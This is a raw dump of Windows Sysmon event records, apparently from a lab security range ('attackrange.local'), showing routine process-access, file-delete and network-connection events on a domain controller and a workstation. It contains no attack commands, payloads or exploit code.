Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 10341000x80000000000000001051985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C7F-6151-6A7A-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8C7F-6151-6A7A-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.217{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C7F-6151-6A7A-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.204{5EBD8912-8C7F-6151-6A7A-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.186{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B87AC76E51FEDD8A9A4FA770441944B,SHA256=0A081672324E166810DD339160E7E6E2D7739A9FA77DD479FC730B7F3F618699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.017{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A07A9174E40620BA4FCCF07F6547964A,SHA256=17057C84F977117D9E2F27173BF859EAD1409909B99F87478B55C2617D135E68,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:53.778{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53483-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:56.317{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD7D89ABEA597B065FA77BEC07126736,SHA256=B58620FFA4F1273602251953E89763ABC2C44D122B65B6DEF2EC1AB260F6256E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:56.317{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=261DFE717E27F56970FFF4E6885C04ED,SHA256=C0DF259EECB939F107C706C3AC12E390F5EEC85EEEA1227411F16D87F37BA3FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:56.070{5EBD8912-8C7F-6151-6B7A-00000000FC01}36004904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.045{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53693-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001052008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:57.416{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E23E80F0AF4B872316FE1D625D969FF,SHA256=F0BF5E33319CEBCEB013783FA38A810632568C8E8D22DE97A3EC2F14D8DDDF43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:57.335{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2283477A49C7BE8CC58E820AAC39C49,SHA256=4B887699FCF4A71AB20B29C8F873C7D59D690ADF175CC5F8E178C04E935A14DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:57.179{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2B046878A05EA3235E9E2866C0D6C3C,SHA256=3464D5CDF7F01F7B45402AA311F51AECBDA68829CB65B3B554433F5BD5971A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:57.200{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\10598MD5=516ED2090D370A6557CC24095B0EB799,SHA256=99018B5D8C024A5767E52FA9F97FEB02B72D16162458AA2A1578545F685F5460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:58.194{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB080DEFD8DA525C72A32870CF990A49,SHA256=E2C38A3FDC67735CFABD0EDED5C4472841F78401000B18540759CEBCCCA8DA40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.539{5EBD8912-7F2D-614D-0B00-00000000FC01}6244740C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001052010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.399{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911008B6B8230E3A2241B0D67D031DDC,SHA256=54770EE4A85E895A517639E2E7A464830507C3593A9737D9923711BCF19057B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:59.444{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=669E339B6D4A588B43EE1C16C1E84F2A,SHA256=C63DCA318EA2048CA030A72AACB5FA9DB95D5950A10E1183C0A71C485D34BFF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.121{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local53485-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001052016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.121{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53485-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001052015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.111{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53484-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001052014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:58.111{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53484-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 23542300x80000000000000001052013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:59.438{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E77AC29546C98598F38FBB009B171847,SHA256=7C4908B2B68F6112B01193F3FB722E9C3BC58AFB09BAB6D351C743108FAEC014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:59.401{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD154A0EFF048A186359FD18DC7D9895,SHA256=FB89969B42BDC250479F93E739A7B7B55F5D7656C70B8D0E744DA454C39897B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:55.879{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59469-false10.0.1.12-8000- 23542300x8000000000000000980286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:00.601{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67622909772D07DD43CBC58F4EA4B74A,SHA256=94E22488567C4F999AA9FA753B549D2C7EE73B08487F2751BC852705C3AFB248,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 